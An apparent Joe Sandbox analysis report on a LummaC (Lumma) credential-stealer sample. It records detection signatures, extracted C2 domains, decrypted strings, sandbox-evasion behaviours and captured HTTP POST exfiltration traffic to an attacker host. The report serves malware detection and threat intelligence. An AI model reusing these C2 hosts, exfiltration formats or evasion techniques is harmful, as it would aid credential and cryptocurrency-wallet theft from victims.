Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
MaZjv5XeQi.exe

Overview

General Information

Sample name:MaZjv5XeQi.exe
renamed because original name is a hash value
Original sample name:20460f73ddd6da12a34a1bc6911b0538.exe
Analysis ID:1580922
MD5:20460f73ddd6da12a34a1bc6911b0538
SHA1:643fdda94defd6dc666e446dac08887c6799d9ef
SHA256:c25a7ddb2f76edf74c0174c631be03fca999cc3052e47f7a47ea41dc92657780
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Detected potential crypto function
Entry point lies outside standard sections
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • MaZjv5XeQi.exe (PID: 5608 cmdline: "C:\Users\user\Desktop\MaZjv5XeQi.exe" MD5: 20460F73DDD6DA12A34A1BC6911B0538)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["manyrestro.lat", "tentabatte.lat", "curverpluch.lat", "slipperyloo.lat", "wordyfindy.lat", "observerfry.lat", "bashfulacid.lat", "talkynicer.lat", "shapestickyr.lat"], "Build id": "PsFKDg--pablo"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000003.2209696792.0000000000FE7000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000003.2209553671.0000000000FE6000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000003.2209596373.0000000000F8E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000000.00000003.2209761021.0000000000F91000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              00000000.00000003.2233422671.0000000000F91000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                Click to see the 4 entries

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-26T13:14:15.113927+010020283713Unknown Traffic192.168.2.549704104.102.49.254443TCP
                2024-12-26T13:14:17.635550+010020283713Unknown Traffic192.168.2.549705104.21.66.86443TCP
                2024-12-26T13:14:19.766992+010020283713Unknown Traffic192.168.2.549706104.21.66.86443TCP
                2024-12-26T13:14:22.341952+010020283713Unknown Traffic192.168.2.549707104.21.66.86443TCP
                2024-12-26T13:14:24.656109+010020283713Unknown Traffic192.168.2.549708104.21.66.86443TCP
                2024-12-26T13:14:27.144452+010020283713Unknown Traffic192.168.2.549709104.21.66.86443TCP
                2024-12-26T13:14:29.988082+010020283713Unknown Traffic192.168.2.549712172.67.157.254443TCP
                2024-12-26T13:14:32.833657+010020283713Unknown Traffic192.168.2.549715172.67.157.254443TCP
                2024-12-26T13:14:36.082596+010020283713Unknown Traffic192.168.2.549728172.67.157.254443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-26T13:14:18.418371+010020546531A Network Trojan was detected192.168.2.549705104.21.66.86443TCP
                2024-12-26T13:14:20.561905+010020546531A Network Trojan was detected192.168.2.549706104.21.66.86443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-26T13:14:18.418371+010020498361A Network Trojan was detected192.168.2.549705104.21.66.86443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-26T13:14:20.561905+010020498121A Network Trojan was detected192.168.2.549706104.21.66.86443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-26T13:14:13.293004+010020584801Domain Observed Used for C2 Detected192.168.2.5633611.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-26T13:14:12.962681+010020584841Domain Observed Used for C2 Detected192.168.2.5619841.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-26T13:14:12.539037+010020584921Domain Observed Used for C2 Detected192.168.2.5497931.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-26T13:14:12.679082+010020585001Domain Observed Used for C2 Detected192.168.2.5562611.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-26T13:14:12.397561+010020585021Domain Observed Used for C2 Detected192.168.2.5599381.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-26T13:14:12.820808+010020585101Domain Observed Used for C2 Detected192.168.2.5569811.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-26T13:14:13.124075+010020585121Domain Observed Used for C2 Detected192.168.2.5589931.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-26T13:14:12.257087+010020585141Domain Observed Used for C2 Detected192.168.2.5495901.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-26T13:14:25.521287+010020480941Malware Command and Control Activity Detected192.168.2.549708104.21.66.86443TCP
                2024-12-26T13:14:30.758464+010020480941Malware Command and Control Activity Detected192.168.2.549712172.67.157.254443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-26T13:14:15.913923+010028586661Domain Observed Used for C2 Detected192.168.2.549704104.102.49.254443TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: MaZjv5XeQi.exeAvira: detected
                Antivirus detection for URL or domain
                Source: https://lev-tolstoi.com/uAvira URL Cloud: Label: malware
                Source: https://lev-tolstoi.com/MSWznTY69wwRW38B95y2Avira URL Cloud: Label: malware
                Source: https://lev-tolstoi.com/apih3Avira URL Cloud: Label: malware
                Source: https://lev-tolstoi.com/api0GUPAvira URL Cloud: Label: malware
                Source: https://lev-tolstoi.com/apia3Avira URL Cloud: Label: malware
                Source: https://lev-tolstoi.com/apixIAvira URL Cloud: Label: malware
                Source: https://lev-tolstoi.com/PPLAvira URL Cloud: Label: malware
                Source: https://lev-tolstoi.com/MSWznTY69wwRW38B95Avira URL Cloud: Label: malware
                Source: https://lev-tolstoi.com/MSWznTY69wwRW38B95-Avira URL Cloud: Label: malware
                Source: https://lev-tolstoi.com/V4Avira URL Cloud: Label: malware
                Source: https://lev-tolstoi.com/piy7Avira URL Cloud: Label: malware
                Source: https://lev-tolstoi.com/WCAvira URL Cloud: Label: malware
                Source: https://lev-tolstoi.com/apisAvira URL Cloud: Label: malware
                Found malware configuration
                Source: MaZjv5XeQi.exe.5608.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["manyrestro.lat", "tentabatte.lat", "curverpluch.lat", "slipperyloo.lat", "wordyfindy.lat", "observerfry.lat", "bashfulacid.lat", "talkynicer.lat", "shapestickyr.lat"], "Build id": "PsFKDg--pablo"}
                Multi AV Scanner detection for submitted file
                Source: MaZjv5XeQi.exeReversingLabs: Detection: 63%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: MaZjv5XeQi.exeJoe Sandbox ML: detected
                Sample uses string decryption to hide its real strings
                Source: 00000000.00000003.2044497480.0000000004C50000.00000004.00001000.00020000.00000000.sdmpString decryptor: bashfulacid.lat
                Source: 00000000.00000003.2044497480.0000000004C50000.00000004.00001000.00020000.00000000.sdmpString decryptor: tentabatte.lat
                Source: 00000000.00000003.2044497480.0000000004C50000.00000004.00001000.00020000.00000000.sdmpString decryptor: curverpluch.lat
                Source: 00000000.00000003.2044497480.0000000004C50000.00000004.00001000.00020000.00000000.sdmpString decryptor: talkynicer.lat
                Source: 00000000.00000003.2044497480.0000000004C50000.00000004.00001000.00020000.00000000.sdmpString decryptor: shapestickyr.lat
                Source: 00000000.00000003.2044497480.0000000004C50000.00000004.00001000.00020000.00000000.sdmpString decryptor: manyrestro.lat
                Source: 00000000.00000003.2044497480.0000000004C50000.00000004.00001000.00020000.00000000.sdmpString decryptor: slipperyloo.lat
                Source: 00000000.00000003.2044497480.0000000004C50000.00000004.00001000.00020000.00000000.sdmpString decryptor: wordyfindy.lat
                Source: 00000000.00000003.2044497480.0000000004C50000.00000004.00001000.00020000.00000000.sdmpString decryptor: observerfry.lat
                Source: 00000000.00000003.2044497480.0000000004C50000.00000004.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                Source: 00000000.00000003.2044497480.0000000004C50000.00000004.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                Source: 00000000.00000003.2044497480.0000000004C50000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                Source: 00000000.00000003.2044497480.0000000004C50000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                Source: 00000000.00000003.2044497480.0000000004C50000.00000004.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
                Source: 00000000.00000003.2044497480.0000000004C50000.00000004.00001000.00020000.00000000.sdmpString decryptor: PsFKDg--pablo
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 0_2_009B57C0 CryptUnprotectData,0_2_009B57C0
                Source: MaZjv5XeQi.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49704 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49705 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49706 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.5:49709 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49712 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.5:49715 version: TLS 1.2
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h0_2_009E0340
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 4x nop then mov edx, ebx0_2_009A8600
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 4x nop then mov edi, dword ptr [esi+30h]0_2_009ACC7A
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx-16h]0_2_009E0D20
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_009CD34A
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 4x nop then mov eax, ebx0_2_009C7440
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+09AD4080h]0_2_009C7440
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-16h]0_2_009E1720
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 4x nop then mov word ptr [eax], cx0_2_009C1A10
                Source: C:\Users\user\Desktop\MaZjv5XeQi.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_009CC09E

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2058512 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tentabatte .lat) : 192.168.2.5:58993 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058502 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (slipperyloo .lat) : 192.168.2.5:59938 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058510 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (talkynicer .lat) : 192.168.2.5:56981 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058500 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shapestickyr .lat) : 192.168.2.5:56261 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058484 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (curverpluch .lat) : 192.168.2.5:61984 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058514 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wordyfindy .lat) : 192.168.2.5:49590 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058492 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (manyrestro .lat) : 192.168.2.5:49793 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2058480 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bashfulacid .lat) : 192.168.2.5:63361 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.5:49704 -> 104.102.49.254:443
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49706 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49705 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49706 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49712 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49708 -> 104.21.66.86:443
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: manyrestro.lat
                Source: Malware configuration extractorURLs: tentabatte.lat
                Source: Malware configuration extractorURLs: curverpluch.lat
                Source: Malware configuration extractorURLs: slipperyloo.lat
                Source: Malware configuration extractorURLs: wordyfindy.lat
                Source: Malware configuration extractorURLs: observerfry.lat
                Source: Malware configuration extractorURLs: bashfulacid.lat
                Source: Malware configuration extractorURLs: talkynicer.lat
                Source: Malware configuration extractorURLs: shapestickyr.lat
                Source: Joe Sandbox ViewIP Address: 104.21.66.86 104.21.66.86
                Source: Joe Sandbox ViewIP Address: 172.67.157.254 172.67.157.254
                Source: Joe Sandbox ViewIP Address: 104.102.49.254 104.102.49.254
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49715 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49709 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49706 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49705 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49708 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49707 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49712 -> 172.67.157.254:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49704 -> 104.102.49.254:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49728 -> 172.67.157.254:443
                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 47Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=RN9M0MOCCIEDMK7GHUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12829Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=OP9KY22WZVVGYZ4User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15059Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=9WS1RYM3User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20507Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=CW22BAAPRYQOSPWUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1251Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=21B385563K4User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 570977Host: lev-tolstoi.com
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                Source: MaZjv5XeQi.exe, 00000000.00000003.2110141184.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133467310.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: om/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://play equals www.youtube.com (Youtube)
                Source: MaZjv5XeQi.exe, 00000000.00000003.2110141184.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-sr equals www.youtube.com (Youtube)
                Source: global trafficDNS traffic detected: DNS query: observerfry.lat
                Source: global trafficDNS traffic detected: DNS query: wordyfindy.lat
                Source: global trafficDNS traffic detected: DNS query: slipperyloo.lat
                Source: global trafficDNS traffic detected: DNS query: manyrestro.lat
                Source: global trafficDNS traffic detected: DNS query: shapestickyr.lat
                Source: global trafficDNS traffic detected: DNS query: talkynicer.lat
                Source: global trafficDNS traffic detected: DNS query: curverpluch.lat
                Source: global trafficDNS traffic detected: DNS query: tentabatte.lat
                Source: global trafficDNS traffic detected: DNS query: bashfulacid.lat
                Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                Source: global trafficDNS traffic detected: DNS query: lev-tolstoi.com
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
                Source: MaZjv5XeQi.exe, 00000000.00000003.2110141184.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133467310.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133542183.0000000000F91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
                Source: MaZjv5XeQi.exe, 00000000.00000003.2181742814.00000000057D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: MaZjv5XeQi.exe, 00000000.00000003.2181742814.00000000057D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: MaZjv5XeQi.exe, 00000000.00000003.2181742814.00000000057D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: MaZjv5XeQi.exe, 00000000.00000003.2181742814.00000000057D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: MaZjv5XeQi.exe, 00000000.00000003.2181742814.00000000057D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: MaZjv5XeQi.exe, 00000000.00000003.2181742814.00000000057D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: MaZjv5XeQi.exe, 00000000.00000003.2181742814.00000000057D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: MaZjv5XeQi.exe, 00000000.00000003.2181742814.00000000057D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: MaZjv5XeQi.exe, 00000000.00000003.2181742814.00000000057D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133421540.0000000000FF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133421540.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133421540.0000000000FF3000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
                Source: MaZjv5XeQi.exe, 00000000.00000003.2181742814.00000000057D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: MaZjv5XeQi.exe, 00000000.00000003.2181742814.00000000057D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: MaZjv5XeQi.exe, 00000000.00000003.2134675716.000000000575B000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2134560297.000000000575B000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2134507540.000000000575E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
